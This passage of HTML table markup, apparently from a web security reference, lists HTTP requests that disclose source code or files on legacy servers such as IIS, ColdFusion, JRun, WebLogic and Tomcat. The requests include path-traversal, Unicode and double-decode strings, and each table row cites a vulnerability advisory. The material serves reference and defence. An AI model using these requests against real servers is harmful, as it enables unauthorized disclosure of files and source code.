<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET /CFDOCS/snippets/viewexample.cfm?viewexample.cfm Tagname=<span
|
||||
class=docemphasis1><relative path to CFM file></span> HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/115" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/115</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Allaire JRun Alternative Data Stream </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET /file.jsp::$DATA HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/3664" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/3664</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Allaire JRun Server Side Include </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=doctext>GET /file HTTP/1.0</p>
|
||||
<p class=doctext>Content Length: <span class=docemphasis1><length of
|
||||
filename + 28></span> <!—#include virtual="<span
|
||||
class=docemphasis1><filename></span>"—></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/3589" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/3589</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Apache Tomcat %70 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=doctext>1. GET /file.js%70 HTTP/1.0</p>
|
||||
<p class=doctext>2. GET /file%252ejsp HTTP/1.0</p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/2527" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/2527</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>BEA WebLogic Case Sensitive File Extension </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=doctext>1. GET /file.JSP HTTP/1.0</p>
|
||||
<p class=doctext>2. GET /file.jsP HTTP/1.0</p>
|
||||
<p class=doctext>3. GET /file.Jsp HTTP/1.0</p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/1328" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/1328</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>BEA WebLogic 5.1 %70 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET /file.js%70 HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/2527" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/2527</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>BEA WebLogic FileServlet </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET /ConsoleHelp/file.jsp HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/1518" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/1518</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>BEA WebLogic /file/ </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET /file/file.jsp HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/1378" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/1378</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>BEA WebLogic /*.shtml/ </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET /*.shtml/file.jsp HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/1517" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/1517</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>IBM WebSphere Case Sensitive File Extension </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=doctext>1. GET /file.JSP HTTP/1.0</p>
|
||||
<p class=doctext>2. GET /file.jsP HTTP/1.0</p>
|
||||
<p class=doctext>3. GET /file.Jsp HTTP/1.0</p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/1328" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/1328</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>IBM WebSphere /servlet/file/ </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET /servlet/file/file.jsp HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/1500" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/1500</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Microsoft IIS 4.0 + FAT Filesystem </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET /file.%E2%73%70 HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/2909" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/2909</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Microsoft IIS 4.0 Alternative Data Stream </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET /file::$DATA HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/149" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/149</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Microsoft IIS +.htr </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET /file.asp+.htr HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/1488" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/1488</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Microsoft IIS Translate: f </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET /file.asp HTTP/1.0 Translate: f </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/1578" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/1578</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Microsoft IIS 3.0 %2e </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET /file%2easp HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/1814" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/1814</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Microsoft IIS 2.0/3.0 Append "." </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=doctext>1. GET /file.asp. HTTP/1.0</p>
|
||||
<p class=doctext>2. GET /file.pl HTTP/1.0</p>
|
||||
<p class=doctext>3. GET /file.asp%2e HTTP/1.0</p>
|
||||
<p class=doctext>4. GET /file.pl%2e HTTP/1.0</p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/2074" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/2074</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Oracle /_pages/ </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET /_pages/ HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Sun Java Web Server .jhtml </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=doctext>1. GET /file.jhtml. HTTP/1.0</p>
|
||||
<p class=doctext>2. GET /file.jhtml\HTTP/1.0</p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/1891" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/1891</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span class=docemphasis1><span style='font-size:10.5pt;
|
||||
font-family:Arial;color:black'>File Disclosure</span></span><span
|
||||
style='font-size:10.5pt;font-family:Arial;color:black'> <span
|
||||
class=docemphasis1>Vulnerable Application</span> </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span class=docemphasis1><span style='font-size:10.5pt;
|
||||
font-family:Arial;color:black'>HTTP Request</span></span><span
|
||||
style='font-size:10.5pt;font-family:Arial;color:black'> </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span class=docemphasis1><span style='font-size:10.5pt;
|
||||
font-family:Arial;color:black'>Vulnerability Information</span></span><span
|
||||
style='font-size:10.5pt;font-family:Arial;color:black'> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Allaire ColdFusion Server exprcalc.cfm </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET /cfdocs/expeval/ExprCalc.cfm?OpenFile Path=c:\file HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/115" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/115</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Allaire ColdFusion openfile.cfm </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET /cfdocs/expeval/openfile.cfm ?????????? HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/115" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/115</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Allaire ColdFusion sourcewindow.cfm </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET /cfdocs/exampleapp/docs/sourcewindow.cfm?Template=../../file
|
||||
HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/115" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/115</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Allaire JRun /servlet/ </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=doctext>1. GET /servlet/ssiservlet/../../file HTTP/1.0</p>
|
||||
<p class=doctext>2. GET /servlet/com.livesoftware.jrun
|
||||
plugins.ssi.SSIFilter/../../file HTTP/1.0</p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/1833" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/1833</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Apache Web Server + PHP.EXE for Win32 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET /php/php.exe?c:\file HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/3786" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/3786</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Apache Web Server + PHP3 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET /file.php3.%5c../..%5c<span class=docemphasis1><relative
|
||||
path to file</span>> HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/2060" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/2060</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Microsoft IIS Unicode </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=doctext>1. GET /scripts/..%c1%1c../<span class=docemphasis1><relative
|
||||
path to file></span> HTTP/1.0</p>
|
||||
<p class=doctext>2. GET /scripts/..%c0%9v../<span class=docemphasis1><</span>
|
||||
<span class=docemphasis1>relative path to file></span> HTTP/1.0</p>
|
||||
<p class=doctext>3. GET /scripts/..%c0%af../<span class=docemphasis1><</span>
|
||||
<span class=docemphasis1>relative path to file></span> HTTP/1.0</p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/1806" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/1806</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Microsoft IIS Double Decode </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET /scripts/..%255c..%255c<span class=docemphasis1><relative
|
||||
path to file></span> HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/2708" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/2708</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Microsoft IIS %20.htr </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET /file%20("%20" repeated 230 times).htr HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/1191" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/1191</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Microsoft IIS idq.dll </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET /query.idq?CiTemplate=<span class=docemphasis1><relative
|
||||
path to file> HTTP/1.0</span> </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/968" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/968</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Microsoft IIS showcode.asp </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET /msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/<span
|
||||
class=docemphasis1><relative path to file></span> HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/167" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/167</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Microsoft IIS codebrws.asp </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET /iissamples/exair/howitworks/ codebrws.asp?source=<span
|
||||
class=docemphasis1><relative path to file></span> HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/167" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/167</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Microsoft IIS viewcode.asp </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=doctext>1. GET /Sites/Knowledge/Membership/
|
||||
Inspired/ViewCode.asp?source=<span class=docemphasis1><relative path to
|
||||
file></span> HTTP/1.0</p>
|
||||
<p class=doctext>2. GET /Sites/Knowledge/Membership/ <span
|
||||
class=docemphasis1>Inspiredtutorial</span>/ViewCode.asp?source=<span
|
||||
class=docemphasis1><relative path to file></span> HTTP/1.0</p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a
|
||||
href="http://support.microsoft.com/directory/article.asp?id=kb;en-us;q231656&"
|
||||
target="_blank"><span style='color:#003399'>http://support.microsoft.com/directory/article.asp?ID=KB;EN-US;Q231656&</span></a>;
|
||||
</span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'> </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>3. GET /Sites/Samples/Knowledge/
|
||||
Membership/Inspired/ViewCode.asp? source=<span class=docemphasis1><relative
|
||||
path to file></span> HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Netscape Enterprise Server %20 </span></p>
|
||||
</td>
|
||||
